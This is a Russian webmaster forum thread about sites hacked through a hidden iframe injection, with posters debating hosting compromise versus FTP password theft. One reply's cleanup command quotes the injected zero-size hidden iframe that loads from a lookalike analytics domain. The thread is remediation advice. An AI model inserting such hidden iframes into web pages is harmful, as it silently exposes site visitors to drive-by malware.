- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
В 2023 году Одноклассники пресекли более 9 млн подозрительных входов в учетные записи
И выявили более 7 млн подозрительных пользователей
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Zizizi, есть 3 наиболее вероятных варианта:
1) взлом сервера или администраторского аккаунта панели хостера (очень малый % взомов происходит так)
2) взлом вашего пароля на FTP, часто просто троян на вашем компе ворует пароль, сохранённый в FTP-клиенте
3) взлом через уязвимость сайта (например, о такой уязвимости я недавно писал тут)
Определить п.2 или п.3 можно по логам заходов FTP и по логам web-сервера.
антивирь ниче не нашел
- ну а в FTP логах чего? если ничего и в "крепости" своего кода Вы уверены, то можно обратить внимание на настройки безопасности хостера (например отсутствие safe_mode в PHP на shared тарифах или запустить CGI-скрипт и проверить как "далеко" он может пройтись по системе на shared тарифе). Если что-то Вас насторожило и, Вы нашли похожие проблемы у других клиентов живущих на том же сервере, велика вероятность что проблема все же у хостера (хотя очень сомнительно чтобы у такого хостера как ht-systems.ru существовали "детские" проблемы присущие скул хостам).
Я не говорю, что ТС плох, это было к рассказам про "рутовый FTP", и панель управления :)))
При инсталяции сервера обычно даже SSH -root запрещен не то, что бы FTP ... это маразм...
Кто мне там репу портит?
кароч нод и дрвеб ниче не нашли, в логах за 7 дней тока мои айпишники
скриптов на моих сайтов не было там одна статика, даже ссай нет
в логах за 7 дней тока мои айпишники
- ну и? с Ваших ip-шников правились те файлы где Вы нашли iframe? если да, меняйте FTP-пароль и вспоминайте где Вы могли использовать старый пароль, если нет проблема на стороне хостера
если нет проблема на стороне хостера
Почему Вы делаете такой вывод? Похоже, что Вы не понимаете сам прицпип. Вставка айфрейма (как правило) происходит с другой машины.
Но в данном случае, проблема действительно у ht-systems.
Для удаления вредоносного кода необходимо выполнить:
grep -R google-analistyc.net . | awk '{print $1}' | cut -d ":" -f 1 | xargs -n1 sed -i '' 's|<\!-- ~ --><iframe src=\"http:\/\/google-analistyc.net\/in.cgi?12\" width=\"0\" height=\"0\" style=\"display:none\"><\/iframe><\!-- ~ -->||g'Сто раз подымались подобные темы. 99% ищите у себя на компе.
я пользуюсь макос, например, а такая же проблема возникала
я пользуюсь макос, например, а такая же проблема возникала
Вы серьезно думаете, что под макось не существует малвари? :)
вы меня конечно простите великодушно, но у вас с головой в порядке? на первой же странице был дан ответ, что это был взлом хостинга и на 2 странице было сказанно еще раз что взломали хостера. зачем флудить 3 страницы и искать трояна там где его нет? или прочитал первое сообщение ТС и решил ответить не читая топика?
Почему Вы делаете такой вывод?
Похоже, что Вы не понимаете сам прицпип.
...
Но в данном случае, проблема действительно у ht-systems.
- я тоже уважаю юмор 😂